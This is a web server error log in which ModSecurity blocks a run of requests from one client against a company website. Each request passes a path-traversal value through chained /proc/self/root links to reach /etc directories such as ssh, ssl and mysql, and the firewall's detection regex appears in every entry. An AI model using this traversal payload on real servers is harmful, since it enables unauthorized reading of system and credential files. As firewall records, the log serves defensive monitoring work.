[Fri Mar 20 08:02:44.392549 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.243.128:50252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pVPqxLDW4GITHUkToEAAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:45.692051 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:50258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pVeoXxyEfFpUF8f-BmwAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:48.037905 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:50268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pWOoXxyEfFpUF8f-BoQAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:49.355185 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:50278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pWfqxLDW4GITHUkToFgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:57.303588 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:56062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pYRCii7xarUs8iHZoqAAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:02:58.694985 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.243.128:56072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pYjJ3M9BSuKP7CAYcQgAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:03:03.571465 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.243.128:36838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pZ11pVZ5mVmJwsFMyEQAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:03:05.923416 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:36846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0paeoXxyEfFpUF8f-BrQAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:03:07.197216 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.243.128:36848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pa_XLqtnMIWvjpaKbrQAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:03:09.479467 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:36858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pbda6ubjKNq_cu4bVswAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:03:10.832470 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.243.128:36312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pbgF0L0L-SsrnPo5pfwAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:03:13.237294 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.243.128:36320] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pcfHIg5MgXLBnicP4dgAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:03:14.574021 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.243.128:36324] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pcvHIg5MgXLBnicP4eAAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:03:19.122046 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.243.128:36338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pd_qxLDW4GITHUkToSgAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:03:20.551382 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:48638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pePqxLDW4GITHUkToTAAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:03:22.738015 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.243.128:48648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pegF0L0L-SsrnPo5phAAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:03:27.374743 2026] [:error] [pid 31215:tid 140411699963648] [client 74.7.243.128:48658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pfwF0L0L-SsrnPo5piAAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:03:28.682787 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.243.128:48670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pgAF0L0L-SsrnPo5piQAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:03:33.231382 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.243.128:34182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0phfXLqtnMIWvjpaKbvQAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:03:40.893318 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.243.128:34192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pjPqxLDW4GITHUkToZQAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:03:43.224971 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.243.128:55008] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0pj11pVZ5mVmJwsFMyKAAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
